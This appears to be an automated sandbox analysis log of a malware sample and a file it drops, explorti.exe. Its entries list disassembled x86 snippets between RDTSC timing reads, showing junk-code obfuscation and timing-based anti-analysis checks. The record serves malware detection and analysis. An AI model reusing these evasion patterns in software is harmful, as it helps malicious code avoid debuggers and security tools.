                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0E17 second address: 52D0E94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA5CCB5262Fh 0x00000009 xor ah, 0000002Eh 0x0000000c jmp 00007FA5CCB52639h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a call 00007FA5CCB5262Ah 0x0000001f mov eax, 790683C1h 0x00000024 pop eax 0x00000025 push edi 0x00000026 pushfd 0x00000027 jmp 00007FA5CCB5262Ah 0x0000002c adc si, AFD8h 0x00000031 jmp 00007FA5CCB5262Bh 0x00000036 popfd 0x00000037 pop esi 0x00000038 popad 0x00000039 pop ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA5CCB52631h 0x00000043 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0E94 second address: 52D0EA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0AD7 second address: 52D0ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0ADD second address: 52D0B7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA5CCB7DED3h 0x00000009 adc eax, 20B5619Eh 0x0000000f jmp 00007FA5CCB7DED9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FA5CCB7DED0h 0x0000001b adc cl, FFFFFF98h 0x0000001e jmp 00007FA5CCB7DECBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 mov ebx, ecx 0x0000002b push ecx 0x0000002c pushfd 0x0000002d jmp 00007FA5CCB7DED7h 0x00000032 or ax, 190Eh 0x00000037 jmp 00007FA5CCB7DED9h 0x0000003c popfd 0x0000003d pop ecx 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0B7D second address: 52D0B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0B81 second address: 52D0B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5340B8A second address: 5340BE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push ecx 0x0000000a jmp 00007FA5CCB52635h 0x0000000f pop ecx 0x00000010 call 00007FA5CCB52631h 0x00000015 pushfd 0x00000016 jmp 00007FA5CCB52630h 0x0000001b xor eax, 1C26A628h 0x00000021 jmp 00007FA5CCB5262Bh 0x00000026 popfd 0x00000027 pop eax 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx edx, ax 0x00000031 popad 0x00000032 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5340BE9 second address: 5340C28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA5CCB7DECFh 0x00000009 sub cl, 0000001Eh 0x0000000c jmp 00007FA5CCB7DED9h 0x00000011 popfd 0x00000012 mov eax, 12FCADE7h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5340C28 second address: 5340C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5340C2C second address: 5340C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 534098D second address: 53409A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA5CCB52634h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0359 second address: 52E0368 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52E0368 second address: 52E036E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5340E57 second address: 5340E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0C547E2Ah 0x00000008 mov edx, 139452F6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA5CCB7DECFh 0x0000001c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5340E7D second address: 5340E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5340E81 second address: 5340E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5340E87 second address: 5340EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA5CCB52632h 0x00000009 adc eax, 24647348h 0x0000000f jmp 00007FA5CCB5262Bh 0x00000014 popfd 0x00000015 jmp 00007FA5CCB52638h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA5CCB52637h 0x00000027 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5340EE6 second address: 5340EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5340EEC second address: 5340EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5F150 second address: B5F156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5F156 second address: B5F15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 62EE45 second address: 62E700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007FA5CCB7DECCh 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007FA5CCB7DECEh 0x00000012 push dword ptr [ebp+122D0019h] 0x00000018 or dword ptr [ebp+122D1870h], ebx 0x0000001e call dword ptr [ebp+122D265Bh] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D1870h], esi 0x0000002b xor eax, eax 0x0000002d sub dword ptr [ebp+122D2154h], ebx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 jmp 00007FA5CCB7DED9h 0x0000003c mov dword ptr [ebp+122D33DDh], eax 0x00000042 pushad 0x00000043 xor dl, FFFFFFB5h 0x00000046 jmp 00007FA5CCB7DECCh 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2154h], edx 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jne 00007FA5CCB7DECCh 0x00000061 lodsw 0x00000063 je 00007FA5CCB7DECDh 0x00000069 jnc 00007FA5CCB7DEC7h 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 pushad 0x00000074 add dword ptr [ebp+122D2154h], eax 0x0000007a adc ch, FFFFFFBCh 0x0000007d popad 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 jmp 00007FA5CCB7DED3h 0x00000089 push eax 0x0000008a jng 00007FA5CCB7DED8h 0x00000090 push eax 0x00000091 push edx 0x00000092 je 00007FA5CCB7DEC6h 0x00000098 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79B0F9 second address: 79B0FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79B639 second address: 79B646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007FA5CCB7DEC8h 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79B804 second address: 79B80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79B933 second address: 79B93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79B93D second address: 79B941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79DF7F second address: 79E00A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA5CCB7DEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA5CCB7DECAh 0x00000010 jnp 00007FA5CCB7DEC6h 0x00000016 popad 0x00000017 popad 0x00000018 add dword ptr [esp], 4985A972h 0x0000001f sbb edi, 127BE68Ch 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D17BBh], edi 0x0000002c cmc 0x0000002d popad 0x0000002e push 00000003h 0x00000030 add dword ptr [ebp+122D1870h], ecx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FA5CCB7DEC8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jmp 00007FA5CCB7DED2h 0x00000057 push 00000003h 0x00000059 add esi, dword ptr [ebp+122D267Eh] 0x0000005f push 8A6C0093h 0x00000064 push ecx 0x00000065 pushad 0x00000066 jns 00007FA5CCB7DEC6h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E106 second address: 79E10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E10A second address: 79E10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E10F second address: 79E11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E11F second address: 79E135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA5CCB7DECEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E135 second address: 79E213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FA5CCB52630h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FA5CCB52630h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007FA5CCB52630h 0x0000001f pop eax 0x00000020 call 00007FA5CCB52635h 0x00000025 mov esi, dword ptr [ebp+122D360Dh] 0x0000002b pop esi 0x0000002c push 00000003h 0x0000002e mov edi, dword ptr [ebp+122D1F3Dh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 mov dword ptr [ebp+122D1BF6h], ebx 0x0000003d pop edx 0x0000003e push 00000003h 0x00000040 jnp 00007FA5CCB52629h 0x00000046 movzx edx, cx 0x00000049 call 00007FA5CCB52629h 0x0000004e push edi 0x0000004f jmp 00007FA5CCB5262Eh 0x00000054 pop edi 0x00000055 push eax 0x00000056 push esi 0x00000057 jmp 00007FA5CCB5262Dh 0x0000005c pop esi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 jnp 00007FA5CCB52632h 0x00000067 jp 00007FA5CCB5262Ch 0x0000006d mov eax, dword ptr [eax] 0x0000006f jmp 00007FA5CCB52636h 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 push ebx 0x00000079 push eax 0x0000007a push edx 0x0000007b jp 00007FA5CCB52626h 0x00000081 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E213 second address: 79E272 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FA5CCB7DEC8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007FA5CCB7DECDh 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D2383h], ebx 0x0000002e mov dword ptr [ebp+122D22BAh], edi 0x00000034 popad 0x00000035 pop edx 0x00000036 lea ebx, dword ptr [ebp+12442E53h] 0x0000003c or dword ptr [ebp+122D2097h], edi 0x00000042 push eax 0x00000043 push ebx 0x00000044 jc 00007FA5CCB7DECCh 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E36C second address: 79E385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB5262Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E385 second address: 79E38F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA5CCB7DEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E38F second address: 79E40E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA5CCB52635h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FA5CCB52628h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1F1Dh], ebx 0x0000002b push 00000003h 0x0000002d mov di, si 0x00000030 push 00000000h 0x00000032 call 00007FA5CCB5262Fh 0x00000037 mov edi, dword ptr [ebp+122D33E9h] 0x0000003d pop esi 0x0000003e mov dword ptr [ebp+122D237Eh], ebx 0x00000044 push 00000003h 0x00000046 mov esi, dword ptr [ebp+122D17C0h] 0x0000004c mov esi, dword ptr [ebp+122D3571h] 0x00000052 push A68CC8A4h 0x00000057 push edx 0x00000058 pushad 0x00000059 jno 00007FA5CCB52626h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E40E second address: 79E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 668CC8A4h 0x0000000d mov dword ptr [ebp+122D23ACh], edi 0x00000013 lea ebx, dword ptr [ebp+12442E5Eh] 0x00000019 mov dx, 5C8Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FA5CCB7DED1h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRDTSC instruction interceptor: First address: 79E443 second address: 79E45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52632h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0711 second address: 52F0773 instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FA5CCB7DECCh 0x0000000e push eax 0x0000000f jmp 00007FA5CCB7DECBh 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FA5CCB7DECBh 0x0000001e or ecx, 5475D8DEh 0x00000024 jmp 00007FA5CCB7DED9h 0x00000029 popfd 0x0000002a jmp 00007FA5CCB7DED0h 0x0000002f popad 0x00000030 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0773 second address: 52F0787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov ax, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0787 second address: 52F078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F078B second address: 52F078F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F078F second address: 52F0795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0795 second address: 52F07B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52633h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F07B4 second address: 52F07B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F07B8 second address: 52F07BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F07BE second address: 52F07C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F07C4 second address: 52F07C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F07C8 second address: 52F0855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007FA5CCB7DEC9h 0x00000010 pushad 0x00000011 movzx eax, dx 0x00000014 push edi 0x00000015 pushfd 0x00000016 jmp 00007FA5CCB7DED6h 0x0000001b jmp 00007FA5CCB7DED5h 0x00000020 popfd 0x00000021 pop esi 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007FA5CCB7DECEh 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d jmp 00007FA5CCB7DECBh 0x00000032 mov eax, dword ptr [eax] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FA5CCB7DED4h 0x0000003b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0855 second address: 52F08C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov ch, 28h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 mov eax, 47CDA571h 0x00000015 mov al, 27h 0x00000017 popad 0x00000018 pop eax 0x00000019 jmp 00007FA5CCB52639h 0x0000001e push 4FF61E51h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FA5CCB5262Dh 0x0000002a adc ax, F366h 0x0000002f jmp 00007FA5CCB52631h 0x00000034 popfd 0x00000035 movzx eax, di 0x00000038 popad 0x00000039 xor dword ptr [esp], 3906B051h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F08C2 second address: 52F08DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FA5CCB7DED2h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F08DA second address: 52F08E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F08E0 second address: 52F090F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DECAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA5CCB7DED7h 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F090F second address: 52F0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0915 second address: 52F0919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0919 second address: 52F094C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a call 00007FA5CCB5262Ah 0x0000000f push ecx 0x00000010 pop edi 0x00000011 pop eax 0x00000012 push edx 0x00000013 movzx ecx, di 0x00000016 pop edx 0x00000017 popad 0x00000018 mov dword ptr [esp], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FA5CCB52631h 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F094C second address: 52F095C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA5CCB7DECCh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F095C second address: 52F0984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB5262Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA5CCB52630h 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0984 second address: 52F0993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52F0993 second address: 52F0A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 mov bl, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007FA5CCB52638h 0x00000010 mov dword ptr [esp], ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FA5CCB5262Eh 0x0000001a and esi, 42901BA8h 0x00000020 jmp 00007FA5CCB5262Bh 0x00000025 popfd 0x00000026 mov di, si 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FA5CCB52630h 0x00000032 or ch, 00000008h 0x00000035 jmp 00007FA5CCB5262Bh 0x0000003a popfd 0x0000003b jmp 00007FA5CCB52638h 0x00000040 popad 0x00000041 push eax 0x00000042 pushad 0x00000043 mov dh, 6Bh 0x00000045 call 00007FA5CCB5262Ah 0x0000004a push esi 0x0000004b pop edx 0x0000004c pop ecx 0x0000004d popad 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 call 00007FA5CCB52633h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
